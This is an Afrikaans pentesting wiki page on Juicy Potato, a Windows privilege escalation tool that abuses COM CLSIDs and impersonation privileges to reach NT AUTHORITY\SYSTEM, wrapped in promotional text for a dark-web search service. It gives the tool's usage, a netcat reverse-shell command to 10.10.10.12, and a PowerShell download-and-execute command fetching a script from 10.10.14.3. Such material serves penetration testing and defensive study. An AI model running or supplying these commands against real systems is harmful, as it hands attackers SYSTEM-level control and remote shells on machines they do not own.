WhiteIntel

WhiteIntel is 'n dark-web aangedrewe soekenjin wat gratis funksies bied om te kyk of 'n maatskappy of sy kliënte deur steel-malware gekompromitteer is.

Die primêre doel van WhiteIntel is om rekening-oorneeminge en lospryse-aanvalle te beveg wat voortspruit uit inligtingsteel-malware.

Jy kan hul webwerf besoek en hul enjin vir gratis probeer by:

Juicy Potato (misbruik van die goue voorregte)

'n Gesuikerde weergawe van RottenPotatoNG, met 'n bietjie sap, d.w.s. 'n ander plaaslike voorreg-escalasie-instrument, van 'n Windows-diensrekening na NT AUTHORITY\SYSTEM

Jy kan juicypotato aflaai van https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifacts

Opsomming

Van juicy-potato Leesmy:

RottenPotatoNG en sy variante benut die voorreg-escalasieketting gebaseer op BITS diens met die MiTM-luisteraar op 127.0.0.1:6666 en wanneer jy SeImpersonate of SeAssignPrimaryToken voorregte het. Tydens 'n Windows-bouhersiening het ons 'n opstelling gevind waar BITS opsetlik uitgeskakel was en poort 6666 geneem was.

Ons het besluit om RottenPotatoNG te bewapen: Sê hallo aan Juicy Potato.

Vir die teorie, sien Rotten Potato - Voorreg-escalasie vanaf Diensrekeninge na SYSTEM en volg die ketting van skakels en verwysings.

Ons het ontdek dat, behalwe BITS, daar 'n paar COM-bedienerse is wat ons kan misbruik. Hulle moet net:

1. installeerbaar wees deur die huidige gebruiker, normaalweg 'n "diensgebruiker" wat impersonasievoorregte het

2. die IMarshal-koppelvlak implementeer

3. as 'n verhewe gebruiker hardloop (SYSTEM, Administrateur, ...)

Na 'n bietjie toetsing het ons 'n uitgebreide lys van interessante CLSID's op verskeie Windows-weergawes verkry en getoets.

Sappige besonderhede

JuicyPotato laat jou toe om:

• Teiken CLSID kies enige CLSID wat jy wil. Hier kan jy die lys georganiseer volgens OS vind.

• COM-luisterpoort definieer die COM-luisterpoort wat jy verkies (in plaas van die gemarshalleerde hardgekoppelde 6666)

• COM-luister-IP-adres bind die bediener aan enige IP

• Proseskeuringsmodus afhangende van die geïmpersonaliseerde gebruiker se voorregte kan jy kies uit:

• CreateProcessWithToken (benodig SeImpersonate)

• CreateProcessAsUser (benodig SeAssignPrimaryToken)

• beide

• Proses om te begin begin 'n uitvoerbare lêer of skrifleer as die uitbuiting slaag

• Prosesargument pas die beginproses-argumente aan

• RPC-bedieneradres vir 'n sluipende benadering kan jy aanmeld by 'n eksterne RPC-bediener

• RPC-bedienerpoort nuttig as jy wil aanmeld by 'n eksterne bediener en die firewall poort 135 blokkeer...

• TOETS-modus hoofsaaklik vir toetsdoeleindes, d.w.s. toetsing van CLSIDs. Dit skep die DCOM en druk die gebruiker van die token. Sien hier vir toetsing

Gebruik

T:\>JuicyPotato.exe
JuicyPotato v0.1

Mandatory args:
-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both
-p <program>: program to launch
-l <port>: COM server listen port


Optional args:
-m <ip>: COM server listen address (default 127.0.0.1)
-a <argument>: command line argument to pass to program (default NULL)
-k <ip>: RPC server ip address (default 127.0.0.1)
-n <port>: RPC server listen port (default 135)

Laaste gedagtes

Van juicy-potato Leesmy:

As die gebruiker SeImpersonate of SeAssignPrimaryToken voorregte het, is jy SYSTEM.

Dit is amper onmoontlik om die misbruik van al hierdie COM-bediener te voorkom. Jy kan dalk dink om die toestemmings van hierdie voorwerpe te wysig via DCOMCNFG maar sterkte daarmee, dit gaan 'n uitdaging wees.

Die werklike oplossing is om sensitiewe rekeninge en toepassings wat onder die * SERVICE-rekeninge loop, te beskerm. Om DCOM te stop sal hierdie uitbuiting sekerlik belemmer, maar dit kan 'n ernstige impak op die onderliggende bedryfstelsel hê.

Van: http://ohpe.it/juicy-potato/

Voorbeelde

Nota: Besoek hierdie bladsy vir 'n lys van CLSIDs om te probeer.

Kry 'n nc.exe omgekeerde dopshell

c:\Users\Public>JuicyPotato -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c c:\users\public\desktop\nc.exe -e cmd.exe 10.10.10.12 443" -t *

Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
......
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

c:\Users\Public>

Powershell omgekeer

.\jp.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.14.3:8080/ipst.ps1')" -t *

Begin 'n nuwe CMD (as jy RDP-toegang het)

CLSID Probleme

Dikwels werk die verstek CLSID wat JuicyPotato gebruik nie en misluk die uitbuiting. Gewoonlik neem dit verskeie pogings om 'n werkende CLSID te vind. Om 'n lys van CLSIDs te kry om te probeer vir 'n spesifieke bedryfstelsel, moet jy hierdie bladsy besoek:

Kontroleer CLSIDs

Eerstens, sal jy 'n paar uitvoerbare lêers benodig buite juicypotato.exe.

Laai Join-Object.ps1 af en laai dit in jou PS-sessie, en laai dan GetCLSID.ps1 af en voer dit uit. Daardie skripsie sal 'n lys van moontlike CLSIDs skep om te toets.

Laai dan test_clsid.bat (verander die pad na die CLSID-lys en na die juicypotato-uitvoerbare lêer) af en voer dit uit. Dit sal begin om elke CLSID te probeer, en wanneer die poortnommer verander, sal dit beteken dat die CLSID gewerk het.

Kontroleer die werkende CLSIDs deur die parameter -c te gebruik

Verwysings

• https://github.com/ohpe/juicy-potato/blob/master/README.md

WhiteIntel

WhiteIntel is 'n donkerweb-aangedrewe soekenjin wat gratis funksies bied om te kontroleer of 'n maatskappy of sy kliënte deur diefstal-malware gekompromitteer is.

Die primêre doel van WhiteIntel is om rekening-oorneemings en lospryse-aanvalle te beveg wat voortspruit uit inligtingsteel-malware.

Jy kan hul webwerf besoek en hul enjin gratis probeer by: